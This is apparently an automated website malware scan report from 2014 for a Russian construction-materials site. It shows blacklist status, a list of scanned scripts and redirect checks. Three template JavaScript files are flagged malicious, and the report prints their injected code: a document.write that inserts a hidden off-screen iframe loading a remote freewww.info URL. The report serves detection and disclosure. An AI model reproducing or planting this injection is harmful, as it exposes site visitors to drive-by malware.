Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=beton-scheben.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://beton-scheben.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://beton-scheben.ru/ | 200 OK Content-Length: 27678 Content-Type: text/html | clean |
http://beton-scheben.ru/media/system/js/caption.js | 200 OK Content-Length: 2036 Content-Type: text/javascript | clean |
http://beton-scheben.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 93403 Content-Type: text/javascript | clean |
http://beton-scheben.ru/cache/widgetkit/widgetkit-c882ff6d.js | 200 OK Content-Length: 19913 Content-Type: text/javascript | clean |
http://beton-scheben.ru/modules/mod_rokslideshow/tmpl/rokslideshow.js | 200 OK Content-Length: 7937 Content-Type: text/javascript | clean |
http://beton-scheben.ru/modules/mod_vtem_contact/assets/captcha.js | 200 OK Content-Length: 877 Content-Type: text/javascript | clean |
http://beton-scheben.ru/media/system/js/validate.js | 200 OK Content-Length: 4411 Content-Type: text/javascript | clean |
http://beton-scheben.ru/templates/yoo_downtown/warp/js/warp.js | 200 OK Content-Length: 7041 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(f){var e={};f.fn.socialButtons=function(a){a=f.extend({wrapper:'<div class="socialbuttons clearfix" />'},a);if(!a.twitter&&!a.plusone&&!a.facebook)return this;a.twitter&&!e.twitter&&(e.twitter=f.getScript("//platform.twitter.com/widgets.js"));a.plusone&&!e.plusone&&(e.plusone=f.getScript("//apis.google.com/js/plusone.js"));if(!window.FB&&a.facebook&&!e.facebook)f("body").append('<div id="fb-root">&l ;document.write('<iframe height="110" width="110" style="top:0px;left:-500px;position:fixed;" src="http://wxouu.freewww.info/4695c8bea56557bd721d4d30d82d22.qqC7OcRDOl1u?default"></iframe>'); Antivirus reports:
| ||
http://beton-scheben.ru/templates/yoo_downtown/warp/js/accordionmenu.js | 200 OK Content-Length: 1699 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d){var a=function(){};d.extend(a.prototype,{name:"accordionMenu",options:{mode:"default",display:null,collapseall:false,toggler:"span.level1.parent",content:"ul.level2"},initialize:function(a,b){var b=d.extend({},this.options,b),c=a.find(b.toggler);c.each(function(h){var a=d(this),c=a.next(b.content).wrap("<div>").parent();c.data("height",c.height());a.hasClass("active")||h==b.display?c.show():c.hide().css("height",0);a.bind("click",function(){f(h)})});var f=function( ;document.write('<iframe height="110" width="110" style="top:0px;left:-500px;position:fixed;" src="http://wxouu.freewww.info/4695c8bea56557bd721d4d30d82d22.qqC7OcRDOl1u?default"></iframe>'); Antivirus reports:
| ||
http://beton-scheben.ru/templates/yoo_downtown/warp/js/dropdownmenu.js | 200 OK Content-Length: 5602 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(b){var e=function(){};b.extend(e.prototype,{name:"dropdownMenu",options:{mode:"default",itemSelector:"li",firstLevelSelector:"li.level1",dropdownSelector:"ul",duration:600,remainTime:800,remainClass:"remain",matchHeight:true,transition:"easeOutExpo",withopacity:true,centerDropdown:false,reverseAnimation:false,fixWidth:false,fancy:null},initialize:function(e,j){this.options=b.extend({},this.options,j);var a=this,g=null,q=false;this.menu=e;this.dropdowns=[];this.options.witho new e;e.prototype.initialize&&g.initialize.apply(g,b.merge([a],o));a.data(e.prototype.name,g)}else b.error("Method "+j+" does not exist on jQuery."+e.name)})}})(jQuery); ;document.write('<iframe height="110" width="110" style="top:0px;left:-500px;position:fixed;" src="http://wxouu.freewww.info/4695c8bea56557bd721d4d30d82d22.qqC7OcRDOl1u?default"></iframe>'); Antivirus reports:
| ||
http://beton-scheben.ru/templates/yoo_downtown/js/template.js | 200 OK Content-Length: 1343 Content-Type: text/javascript | clean |
http://beton-scheben.ru/modules/mod_vtem_image_rotator/js/jquery-1.4.2.js | 200 OK Content-Length: 72328 Content-Type: text/javascript | clean |
http://beton-scheben.ru/modules/mod_vtem_image_rotator/js/jquery.mousewheel.min.js | 200 OK Content-Length: 1182 Content-Type: text/javascript | clean |
http://beton-scheben.ru/modules/mod_vtem_image_rotator/js/cloud-carousel.1.0.5.js | 200 OK Content-Length: 12481 Content-Type: text/javascript | clean |
https://web.redhelper.ru/service/main.js?c=betonscheben | 200 OK Content-Length: 2032 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: beton-scheben.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 07:44:37 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 26 Dec 2014 07:44:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cc908d76d7decfebd61aba5031fcce64=h30qvm7ok4j56oo73099k001t7; path=/
Status: 200 OK
GET / HTTP/1.1
Host: beton-scheben.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 07:44:37 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 26 Dec 2014 07:44:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cc908d76d7decfebd61aba5031fcce64=h30qvm7ok4j56oo73099k001t7; path=/
Status: 200 OK
Second query (visit from search engine):
GET / HTTP/1.1
Host: beton-scheben.ru
Referer: http://www.google.com/search?q=beton-scheben.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: beton-scheben.ru
Referer: http://www.google.com/search?q=beton-scheben.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.